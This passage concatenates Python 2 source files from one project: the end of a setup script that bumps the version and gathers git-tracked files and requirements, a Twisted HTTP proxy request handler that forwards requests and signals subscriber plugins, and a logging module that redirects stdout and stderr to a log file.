        v = pkg_resources.parse_version(__version__)
        vints = map(int, v[:3])
        vints[inc] += 1
        cfg["version"] = ".".join(map(str,vints))
        with open("version.py", "w") as f:
            f.write("__version__='%s'"%cfg["version"])
    except:
        pass

    return cfg

def logsetup(setupdict):
    """ log the setupdict """
    output=""
    for k,v in setupdict.items():
        if k == "long_description":
            v=v.splitlines()[0]
        output+="{k}={v}\n".format(**locals())
    log.info(output)

def scripts():
    """ get files from scripts folder and remove any not managed by git """
    if sys.argv[1] != "sdist":
        return None
    files = ["scripts/"+f for f in os.listdir('scripts')]
    gitfiles = check_output(["git", "ls-files"]).splitlines()
    # must remove else any scripts specified are included even if not managed by git
    files = [script for script in files if script in gitfiles]
    return files

def data_files():
    """ get files from root folder and remove any not managed by git """
    if sys.argv[1] != "sdist":
        return None
    files = [f for f in os.listdir(here)]
    gitfiles = check_output(["git", "ls-files"]).splitlines()
    # must remove else any scripts specified are included even if not managed by git
    files = [f for f in files if f in gitfiles]
    return files

def install_requires():
    """ use requirements.txt """
    try:
        with open("requirements.txt", "r") as f:
            reqs = [req.split("#")[0].strip() for req in f.read().splitlines()]
            install_requires = [req for req in reqs if not req.startswith("http")]
            return install_requires
    except IOError:
        return []
    except:
        log.exception("problem parsing install_requires")
        sys.exit()

def dependency_links():
    """ use requirements.txt """
    try:
        with open("requirements.txt", "r") as f:
            reqs = [req.split("#")[0].strip() for req in f.read().splitlines()]
            dependency_links = [req for req in reqs if req.startswith("http")]
            return dependency_links
    except IOError:
        return []
    except:
        log.exception("problem parsing dependency_links")
        sys.exit()

def long_description():
    """ set long description = first README.* """
    try:
        readme = [f for f in os.listdir(here) if f.startswith("README")][0]
        with open(readme, "r") as f:
    	    return f.read()
    except:
     	return ""

main()


""" handles requests and fires signals for subscriber plugins

    usage:
        reactor.listenTCP(port, proxyserver.ProxyFactory())
"""
from tools.logs import log
import logging

from urlparse import urlparse
import os
import tldextract
from tools.tools import zips

from twisted.internet import reactor, ssl
from twisted.web import http
from proxyclient import ProxyClientFactory
from tools.pydispatch2 import Signal

gotRequest = Signal("gotRequest")

class Request(http.Request):
    """ proxy requests via HTTP 
        send signals that can be handled by subscriber plugins
    """
    
    # unique id to track each request in log and browser
    nextid = 1

    def __init__(self, channel, queued):
        http.Request.__init__(self, channel, queued)
        self.version ="HTTP/1.1"
        self.id = "R%s" % Request.nextid
        Request.nextid += 1

    def process(self):
        """ called when request completely received """

        # parse url
        parsed = urlparse(self.uri)
        self.scheme = parsed.scheme
        self.path = parsed.path
        self.query = parsed.query
        if self.query:
            self.pathquery = '%s?%s' % (self.path, self.query)
        else:
            self.pathquery = self.path
        self.host = self.getHeader("Host")

        # extract domain (e.g. used to identify sessions)
        try:
            ext = tldextract.extract(self.host)
            self.domain = ".{domain}.{suffix}".format(domain=ext.domain, suffix=ext.suffix)
        except:
            self.domain = ""
            log.exception("{id} Error in tldextract with {host}".format(id=self.id, host=self.host))

        self.content.seek(0,0)
        self.data = self.content.read()

        if log.getEffectiveLevel()==logging.DEBUG:
            self.setHeader("myid", self.id)

        #log.debug("%s RAW REQUEST:\n%s" % (self.id, self.getRequest()))
        
        gotRequest.send(sender=self)

        # callback may have finished the connection
        if self.finished:
            return

        # set supported compression methods
        try:
            oldcodes = self.getHeader('accept-encoding').split(',')
            newcodes = [code for code in oldcodes if code in zips.methods]
            self.requestHeaders.addRawHeader('Accept-Encoding', ','.join(newcodes))
        except:
            self.requestHeaders.addRawHeader('Accept-Encoding', '')

        log.debug("%s FINAL REQUEST:\n%s" % (self.id, self.getRequest()))

        # note ProxyClientFactory expects dict rather than headers type
        if self.scheme == "https":
            reactor.connectSSL(self.host, 443, \
                                ProxyClientFactory(self.method, self.pathquery, self.version, \
                                self.getAllHeaders(), self.data, self), \
                                ssl.ClientContextFactory())
        else:
            reactor.connectTCP(self.host, 80, \
                ProxyClientFactory(self.method, self.pathquery, self.version, \
                self.getAllHeaders(), self.data, self))

    def getRequest(self):
        """ returns request string """
        output = '\n'.join(["{k}: {v}".format(**locals()) for k, v in self.getAllHeaders().items()])
        return "{method} {pathquery} {version}\n{output}{data}"\
                .format(method=self.method, pathquery=self.pathquery, \
                        version=self.version,output=output, data=self.data)

    def getResponse(self):
        """ returns response string """
        output = "{clientproto} {code} {code_message}\r\n".format(clientproto=self.clientproto,
                    code=self.code, code_message=self.code_message)
        for name, values in self.responseHeaders.getAllRawHeaders():
            for value in values:
                output += "{name}: {value}\r\n".format(**locals())
        for cookie in self.cookies:
            output += 'Set-Cookie: {cookie}\r\n'.format(**locals())
        return output

class Proxy(http.HTTPChannel):
    """ http protocol """
    requestFactory = Request

class ProxyFactory(http.HTTPFactory):
    """ factory that creates a proxy for each request """
    protocol = Proxy

    def log(self, request):
        """ supress request logging """
        pass


"""
    configures logger

    Usage:
        from tools.logs import log, logfile

        # log a message
        log.info("hello")

        # clear logfile
        with open(logfile, 'w'):
            pass
"""
import logging
import os
import sys

logfile = None

class LoggerWriter:
    """ redirects a stream such as stderr/stdout to log file """
    def __init__(self, logger, level):
        self.logger = logger
        self.level = level
 
    def write(self, buf):
      for line in buf.rstrip().splitlines():
         self.logger.log(self.level, line.rstrip())

    def flush(self):
        pass

def _getLog(name=None):
    """ returns a logger with defaults:
            format for log messages
            log directed to console and log file
            logfile is in current.request.folder OR in current directory
            default level is DEBUG
    """
    global logfile

    # configure format including line number to trace message
    if name in ("STDOUT", "STDERR"):
        formatter = logging.Formatter('[%(name)s:%(levelname)s]:%(message)s')
    else:
        formatter = logging.Formatter('[%(name)s:%(levelname)s]:%(message)s\n(%(pathname)s\%(lineno)s, time=%(asctime)s)\n','%H:%M')

    # configure streamhandler
    streamhandler = logging.StreamHandler()
    streamhandler.setFormatter(formatter)

    # configure filehandler
    try:
        # for web2py application
        from gluon import current
        directory = current.request.folder
        if not name:
            name = current.request.application
    except:
        directory = os.getcwd()
    logfile = os.path.join(directory, "log.txt")
    filehandler=logging.FileHandler(logfile)
    filehandler.setFormatter(formatter)

    # configure logger
    log = logging.getLogger(name)
    log.propagate = 0
    log.handlers = []
    log.addHandler(streamhandler)
    log.addHandler(filehandler)
    log.setLevel(logging.DEBUG)

    return log

log = _getLog()

# configure std and err tools.logs
stdlog = _getLog("STDOUT")
errlog = _getLog("STDERR")
sys.stdout = LoggerWriter(stdlog, logging.INFO)
sys.stderr = LoggerWriter(errlog, logging.ERROR)